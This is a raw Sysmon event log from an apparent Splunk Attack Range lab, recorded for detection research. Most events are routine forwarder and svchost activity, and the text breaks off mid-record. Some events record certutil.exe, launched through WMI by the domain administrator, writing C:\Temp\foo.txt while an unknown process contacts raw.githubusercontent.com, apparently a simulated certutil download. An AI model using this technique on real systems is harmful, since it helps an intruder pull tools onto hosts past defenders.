c:\temp\foo.txtC:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000005917875Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.528{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F59052E6F4A7035AB78D2508CC0F31D,SHA256=044591518569E3F848DEFCA3B5E596C49C48924A570A6D29BD27A938E86A4486,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638612Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:20.960{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3F03800B817A4A47A10950D994326C8,SHA256=13D8E64FA5168B18355844F63E52A839FA74853E7B270114B01FC0BB8FDE4AC4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917919Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:20.737{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917918Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:20.737{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917917Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:20.716{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A852EA53FB1881909F522D6CEB23A0FE,SHA256=E4148783D82DD1996AE129D768CB91A27E3440051FE25DD41E39EE5350C09DC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917916Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:20.704{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D775F287EB865ED1A494F5234009E293,SHA256=F0A78B402C817D50DD9596AC642B984057CED901E06FB5EFD2B93DCF5355805E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917915Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:20.581{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A46BB6B43FA24CD2FBE02B3D1806001A,SHA256=A18357C23877D97F35739932E18D134B93754803EA18FCDCD37B28FD840F70F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917924Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:21.745{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74D7A00A19DB6E597432C97761AA6E15,SHA256=282E01E571C7505B328A4167DBD94AE1EAE3DC4500D676F6DCDE3AD843D3D385,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638616Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:21.975{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9B074C19D125EC43DE3215C23FDC5E,SHA256=D824EDF49746E22BC312E02B5485511C763F150DF21707106FF612D5C9E32938,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638615Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:17.427{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57260-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638614Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:21.194{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78B9E5001F7F6EC816E3E990C0E5FAE4,SHA256=71B4C5B6C66299683F9275CC191E4EEEA61EA8077CAFFA88E529757F55E8FF4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638613Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:21.194{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2483BC3AE77B357508695AAE0F6955C2,SHA256=44A21CC8C3DF439F45304CB988C412E99CD388C52D336BC3A9CF3396F858AA78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917923Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:21.737{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917922Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:21.737{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000005917921Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:18.484{00000000-0000-0000-0000-000000000000}8116raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 354300x80000000000000005917920Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:18.480{00000000-0000-0000-0000-000000000000}8116<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1515-false185.199.111.133cdn-185-199-111-133.github.com443https 354300x80000000000000005917928Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:18.582{00000000-0000-0000-0000-000000000000}8116<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1516-false185.199.111.133cdn-185-199-111-133.github.com443https 23542300x80000000000000005917927Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:22.752{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A059AF8602C94ADF0DC09F807D9BAD,SHA256=CF54A2FEB989FD9636F5AA532ADB57395E5B2D6D17F321C07E1ECC27FAD26643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638617Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:22.991{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=492FB6000BBA61588767DECF922FB984,SHA256=000F1862D0A356DDBD67B5A68CB234A14D4CB8B2F7509C9B139623B17288F134,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917926Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:22.738{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917925Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:22.738{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917932Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:23.768{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DAE62F6F2CB7F866F6896B663B6F6DC,SHA256=B9D2F82B9E608F452D0B560BE6A045F9B429C4636A8796D72FC40573EA5783AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917931Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:23.738{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917930Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:23.738{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917929Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:23.092{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22EA184EF40ED873A26263312062C839,SHA256=02748EDDC6CA6640F318E4FF09E705975A9EB18CEF0D3AF4D4322DF5F3D31F33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917936Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:24.774{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3050E79B2FACD8170936B179B949DBE,SHA256=07E80CEEF6D03EDEDC4F59092F1D208432C931FCFBFBC5677B7907D1B8D2A62A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638618Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:24.007{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=444E6E2D5FFBCA234F82B911CB1D8042,SHA256=0317696E9F2F0893486C3B950A962087717402433641041A3259CA11605D2FB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917935Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:24.738{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917934Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:24.738{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005917933Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:20.748{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1517-false10.0.1.12-8000- 23542300x80000000000000005917939Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:25.801{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5A4E2FAB219F93C078EB206B777148C,SHA256=ED73C62E4A5DDE01E5B80C2CAA04B416191B818A6308E7749C935C1222D13677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638619Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:25.022{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A605F2A4FF133BA86043C3641CA4E108,SHA256=9D4468971DA826D280BA66EE1E3F2D596527793743813B2FA6D9C15534F7B839,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917938Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:25.739{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917937Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:25.739{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917979Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.739{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917978Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.739{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917977Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.289{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917976Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.289{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917975Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.284{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917974Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.284{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917973Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.284{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000005917972Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.280{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exeC:\Temp\foo.txt2021-03-24 21:50:19.932 23542300x80000000000000005917971Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.280{896A638B-B422-605B-8B69-00000000AE01}7404ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Temp\foo.txtMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917970Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 